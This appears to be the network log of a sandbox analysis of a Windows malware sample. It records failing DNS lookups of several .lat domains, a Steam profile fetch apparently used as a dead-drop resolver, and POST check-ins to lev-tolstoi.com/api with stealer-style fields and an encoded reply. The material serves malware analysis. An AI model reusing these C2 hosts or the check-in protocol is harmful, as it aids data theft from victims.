                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.812542915 CET192.168.2.41.1.1.10x23d9Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.955604076 CET192.168.2.41.1.1.10x727aStandard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.105932951 CET192.168.2.41.1.1.10xd3c6Standard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.263223886 CET192.168.2.41.1.1.10xb1acStandard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.470705032 CET192.168.2.41.1.1.10x3ef5Standard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.668445110 CET192.168.2.41.1.1.10x9fb4Standard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.810523987 CET192.168.2.41.1.1.10x143dStandard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.951786995 CET192.168.2.41.1.1.10x6661Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.539886951 CET192.168.2.41.1.1.10xa165Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.654759884 CET1.1.1.1192.168.2.40x20faName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.809632063 CET1.1.1.1192.168.2.40xa060Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:36.952377081 CET1.1.1.1192.168.2.40x23d9Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.093200922 CET1.1.1.1192.168.2.40x727aName error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.244659901 CET1.1.1.1192.168.2.40xd3c6Name error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.402496099 CET1.1.1.1192.168.2.40xb1acName error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.663539886 CET1.1.1.1192.168.2.40x3ef5Name error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.806524992 CET1.1.1.1192.168.2.40x9fb4Name error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:37.948013067 CET1.1.1.1192.168.2.40x143dName error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:38.164707899 CET1.1.1.1192.168.2.40x6661No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.681710958 CET1.1.1.1192.168.2.40xa165No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.681710958 CET1.1.1.1192.168.2.40xa165No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                                              • lev-tolstoi.com
                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.449730104.102.49.2544436948C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 08:06:39 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                                              2024-12-23 08:06:40 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:40 GMT
                                                                                                                                                                                                                                              Content-Length: 35121
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: sessionid=060b0cfa47d5459e9b8e163b; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                              2024-12-23 08:06:40 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                              2024-12-23 08:06:40 UTC16384INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                              Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                              2024-12-23 08:06:40 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22
                                                                                                                                                                                                                                              Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
                                                                                                                                                                                                                                              2024-12-23 08:06:40 UTC490INData Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74
                                                                                                                                                                                                                                              Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.449731104.21.66.864436948C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 08:06:41 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:41 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                              2024-12-23 08:06:42 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:42 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=h52ejddaf1bo3sehlmscdqja76; expires=Fri, 18 Apr 2025 01:53:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATWwGGbz32A0mR6w2mYMrFDFEoOkVeovqziN6fnVcZfGF1B9b0Ld90oFYe4FRKH954nBS%2B2FAeH14zDtoVDYo04MPUdxHZTbZdEDbNBJ5eejnUgyfKmi02gzXLwbchPPh98%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66da919c4642dc-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1549&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1759036&cwnd=251&unsent_bytes=0&cid=12f1ef1e9c8b9465&ts=742&x=0"
                                                                                                                                                                                                                                              2024-12-23 08:06:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                              2024-12-23 08:06:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              2192.168.2.449732104.21.66.864436948C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:44 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=8uhemp4ijk7tanenba6bs8kqdl; expires=Fri, 18 Apr 2025 01:53:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dBmmSbNzKffnp0WafOk3yPHA9lzPa00ao1cf0QdQunkfPHc3yuTmN6jk9XBjbqRMdFpYd4zr2QOkSZ38FIA8PMsktqXKiKyBVPHTp1ICqEVdWN82mD3g4aDu2UUAiWrTBs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66daa00d5ede9b-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1476&rtt_var=555&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1968981&cwnd=192&unsent_bytes=0&cid=8a730840ccd2e4ff&ts=773&x=0"
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC252INData Raw: 31 63 61 65 0d 0a 76 6e 68 68 36 78 6c 63 45 32 69 30 71 54 53 6c 55 71 75 71 53 63 65 37 38 7a 72 76 44 5a 77 55 33 65 6b 36 35 38 79 6a 36 6b 6e 46 57 68 66 4a 49 32 67 2f 53 73 66 4d 46 70 38 6d 32 64 38 73 36 35 6d 53 58 73 30 33 2b 6e 57 78 6d 6c 2f 4c 37 74 57 48 61 34 51 65 41 49 64 71 4f 54 39 4b 30 64 45 57 6e 77 6e 51 69 43 79 70 6d 63 6b 59 69 6d 66 2b 64 62 47 4c 57 34 79 6a 30 34 59 71 31 68 51 47 67 33 77 2f 64 77 6e 59 78 46 48 41 4e 38 72 41 4a 36 37 57 6d 31 66 4e 49 62 35 78 70 38 73 41 78 59 48 47 6e 69 6a 7a 47 52 4b 41 4f 79 45 2f 45 35 62 4d 57 6f 64 6f 69 63 73 73 70 64 65 56 58 6f 52 6c 39 48 79 35 69 6c 36 4e 76 4d 71 4d 49 64 59 61 42 59 4a 32 4e 6d 4d 45 30 73 4e 61 78 6a 33 4b 69 47 58 6c 33 6f 6b 59 31 53 2b 74 52 4c
                                                                                                                                                                                                                                              Data Ascii: 1caevnhh6xlcE2i0qTSlUquqSce78zrvDZwU3ek658yj6knFWhfJI2g/SsfMFp8m2d8s65mSXs03+nWxml/L7tWHa4QeAIdqOT9K0dEWnwnQiCypmckYimf+dbGLW4yj04Yq1hQGg3w/dwnYxFHAN8rAJ67Wm1fNIb5xp8sAxYHGnijzGRKAOyE/E5bMWodoicsspdeVXoRl9Hy5il6NvMqMIdYaBYJ2NmME0sNaxj3KiGXl3okY1S+tRL
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC1369INData Raw: 79 61 53 5a 43 6a 30 59 35 72 77 31 51 61 79 58 77 79 4d 56 4b 57 77 31 72 4a 4e 63 72 48 4c 4b 54 5a 67 31 65 4e 62 50 5a 2b 75 34 46 58 69 71 48 50 67 69 7a 55 45 77 53 47 66 44 5a 33 42 64 57 4c 47 49 63 33 30 59 68 7a 35 66 6d 42 57 34 35 37 38 32 66 2f 6c 42 61 63 37 73 61 45 61 34 52 61 42 59 64 36 4d 33 45 59 33 73 42 64 77 69 4c 43 77 53 61 6f 32 5a 78 53 67 6d 7a 2b 63 62 57 42 56 34 2b 71 7a 49 55 74 33 42 70 44 78 7a 73 35 61 55 71 4f 69 33 58 43 49 4d 37 45 50 65 66 6a 30 55 66 44 64 72 35 78 73 38 73 41 78 61 62 45 69 79 6a 58 46 51 43 42 63 43 78 78 47 4e 44 47 55 39 55 32 7a 4d 59 68 70 73 75 62 56 6f 74 73 39 33 32 32 6a 6c 2b 42 37 6f 2f 49 4c 4d 52 61 57 38 6c 61 4d 33 6f 47 33 4e 78 57 68 79 2b 48 30 57 75 69 31 64 45 41 7a 57 76 2f 63
                                                                                                                                                                                                                                              Data Ascii: yaSZCj0Y5rw1QayXwyMVKWw1rJNcrHLKTZg1eNbPZ+u4FXiqHPgizUEwSGfDZ3BdWLGIc30Yhz5fmBW45782f/lBac7saEa4RaBYd6M3EY3sBdwiLCwSao2ZxSgmz+cbWBV4+qzIUt3BpDxzs5aUqOi3XCIM7EPefj0UfDdr5xs8sAxabEiyjXFQCBcCxxGNDGU9U2zMYhpsubVots9322jl+B7o/ILMRaW8laM3oG3NxWhy+H0Wui1dEAzWv/c
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC1369INData Raw: 43 74 6f 48 51 61 2f 59 5a 46 34 70 78 66 45 51 4a 32 4d 56 52 30 58 44 57 68 6a 4c 6c 33 70 30 59 31 53 2f 7a 64 37 65 4e 53 6f 71 6a 77 6f 59 6c 30 78 38 4d 67 58 73 2b 66 41 2f 53 77 46 33 45 50 63 33 61 49 61 58 52 6c 46 6d 48 5a 62 34 34 2f 34 78 41 78 66 61 42 75 54 7a 58 57 44 61 4b 64 54 42 32 48 4a 62 55 47 4e 35 77 7a 73 52 72 2f 5a 6d 63 55 49 68 71 38 58 65 31 68 56 32 50 6f 73 6d 47 4b 4d 34 56 42 34 6c 33 4e 6e 73 48 32 4d 39 65 7a 6a 76 43 7a 69 75 6b 30 39 45 57 7a 57 6a 6d 4e 75 66 4c 62 49 4b 69 7a 49 64 70 36 52 6b 4e 68 33 77 6f 4d 52 57 59 30 68 62 41 50 49 6d 51 61 36 6e 51 6b 56 4f 48 61 2f 35 78 73 6f 35 62 67 71 33 4d 6a 79 48 53 48 51 65 46 63 6a 4e 33 43 74 48 50 55 39 55 31 77 4d 51 6e 35 5a 66 52 58 35 55 76 70 6a 61 51 6a 45
                                                                                                                                                                                                                                              Data Ascii: CtoHQa/YZF4pxfEQJ2MVR0XDWhjLl3p0Y1S/zd7eNSoqjwoYl0x8MgXs+fA/SwF3EPc3aIaXRlFmHZb44/4xAxfaBuTzXWDaKdTB2HJbUGN5wzsRr/ZmcUIhq8Xe1hV2PosmGKM4VB4l3NnsH2M9ezjvCziuk09EWzWjmNufLbIKizIdp6RkNh3woMRWY0hbAPImQa6nQkVOHa/5xso5bgq3MjyHSHQeFcjN3CtHPU9U1wMQn5ZfRX5UvpjaQjE
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC1369INData Raw: 67 53 4c 4f 46 41 32 41 64 6a 68 35 44 64 6a 47 58 63 45 37 7a 73 38 74 71 4e 47 63 58 59 35 75 2b 6e 79 74 69 46 4f 50 6f 38 76 49 5a 5a 77 64 47 38 6b 6a 66 6c 59 47 2f 39 74 4e 31 53 61 4a 31 32 57 38 6d 5a 5a 55 7a 54 65 2b 64 62 43 43 56 34 32 6d 7a 6f 63 76 30 68 77 46 68 48 34 78 65 78 6a 65 78 56 76 4d 50 38 4c 61 4b 36 6a 64 6e 56 79 46 5a 50 51 32 38 63 74 66 6e 65 36 5a 79 42 37 52 46 51 4f 4b 62 58 35 75 52 4d 2b 4c 55 63 74 77 6b 59 67 6e 71 39 6d 65 56 49 46 6b 39 6e 65 7a 68 56 2b 41 70 38 6d 41 4f 64 30 65 43 34 68 31 4d 58 41 4f 30 38 35 53 77 44 54 50 78 32 76 72 6d 5a 5a 41 7a 54 65 2b 57 5a 69 2b 47 71 53 55 67 5a 64 6c 78 56 6f 45 68 54 74 6d 4d 51 62 56 78 31 37 49 4e 73 44 45 49 61 7a 53 6e 56 4f 4a 59 2f 64 7a 75 59 70 64 67 4b 2f
                                                                                                                                                                                                                                              Data Ascii: gSLOFA2Adjh5DdjGXcE7zs8tqNGcXY5u+nytiFOPo8vIZZwdG8kjflYG/9tN1SaJ12W8mZZUzTe+dbCCV42mzocv0hwFhH4xexjexVvMP8LaK6jdnVyFZPQ28ctfne6ZyB7RFQOKbX5uRM+LUctwkYgnq9meVIFk9nezhV+Ap8mAOd0eC4h1MXAO085SwDTPx2vrmZZAzTe+WZi+GqSUgZdlxVoEhTtmMQbVx17INsDEIazSnVOJY/dzuYpdgK/
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC1369INData Raw: 68 51 4f 68 6e 4d 32 65 41 76 53 7a 6c 76 42 50 4d 50 4a 4c 4b 76 58 6d 52 6a 44 4c 2f 6c 75 2f 39 4d 59 70 4c 37 61 6d 6a 33 52 4f 77 36 47 4f 79 45 2f 45 35 62 4d 57 6f 64 6f 69 63 45 35 6f 64 53 44 55 59 70 68 38 58 57 74 69 6c 57 4f 76 4d 61 48 4c 39 73 57 42 59 5a 39 50 33 51 41 32 73 78 54 7a 44 2f 46 69 47 58 6c 33 6f 6b 59 31 53 2f 51 66 61 79 63 57 34 75 6c 31 35 4e 72 77 31 51 61 79 58 77 79 4d 56 4b 57 79 46 33 4d 4e 4d 6e 45 4b 36 48 55 6b 55 71 43 61 50 6c 2f 74 4a 6c 53 67 71 6e 4b 67 43 44 54 48 42 47 46 64 53 78 30 47 4d 53 4c 47 49 63 33 30 59 68 7a 35 65 2b 57 53 4a 31 73 76 45 65 70 69 45 36 4f 6f 38 33 49 4e 4a 49 44 51 34 35 33 66 69 6c 4b 30 4d 52 66 78 44 2f 49 77 53 65 6f 33 4a 68 64 6a 47 6e 36 66 4c 57 4c 58 6f 4f 76 78 49 49 6f
                                                                                                                                                                                                                                              Data Ascii: hQOhnM2eAvSzlvBPMPJLKvXmRjDL/lu/9MYpL7amj3ROw6GOyE/E5bMWodoicE5odSDUYph8XWtilWOvMaHL9sWBYZ9P3QA2sxTzD/FiGXl3okY1S/QfaycW4ul15Nrw1QayXwyMVKWyF3MNMnEK6HUkUqCaPl/tJlSgqnKgCDTHBGFdSx0GMSLGIc30Yhz5e+WSJ1svEepiE6Oo83INJIDQ453filK0MRfxD/IwSeo3JhdjGn6fLWLXoOvxIIo
                                                                                                                                                                                                                                              2024-12-23 08:06:44 UTC1369INData Raw: 6b 6a 66 6e 49 4e 31 63 70 63 7a 6a 7a 47 7a 79 2b 33 30 35 5a 4b 6a 47 37 31 65 37 4f 4c 56 59 69 6b 77 49 45 6d 30 42 63 45 6a 6e 51 37 4d 55 53 57 7a 45 36 48 61 49 6e 70 4a 71 37 56 79 67 4c 4e 63 4c 42 76 2f 34 78 55 78 66 61 42 69 43 48 5a 45 41 36 4b 64 44 31 6a 43 39 44 5a 56 73 6f 36 32 38 49 67 6f 4e 53 63 56 59 35 70 2b 48 32 7a 6d 56 47 46 72 63 72 49 5a 5a 77 64 47 38 6b 6a 66 6c 49 64 77 4d 46 52 79 79 62 43 79 53 69 7a 31 49 45 59 77 79 2f 76 63 61 37 4c 41 4a 4f 2b 31 6f 38 30 6b 67 4e 44 6a 6e 64 2b 4b 55 72 51 77 6c 44 41 4e 73 66 61 4c 71 50 57 6e 6c 47 45 61 2f 5a 31 76 34 39 63 67 71 76 43 68 43 44 62 47 51 79 4e 63 6a 42 34 42 5a 61 46 46 73 41 6f 69 5a 42 72 68 4d 4b 53 56 49 41 76 34 54 69 6d 79 31 2b 4a 37 70 6e 49 4a 39 49 66 41
                                                                                                                                                                                                                                              Data Ascii: kjfnIN1cpczjzGzy+305ZKjG71e7OLVYikwIEm0BcEjnQ7MUSWzE6HaInpJq7VygLNcLBv/4xUxfaBiCHZEA6KdD1jC9DZVso628IgoNScVY5p+H2zmVGFrcrIZZwdG8kjflIdwMFRyybCySiz1IEYwy/vca7LAJO+1o80kgNDjnd+KUrQwlDANsfaLqPWnlGEa/Z1v49cgqvChCDbGQyNcjB4BZaFFsAoiZBrhMKSVIAv4Timy1+J7pnIJ9IfA
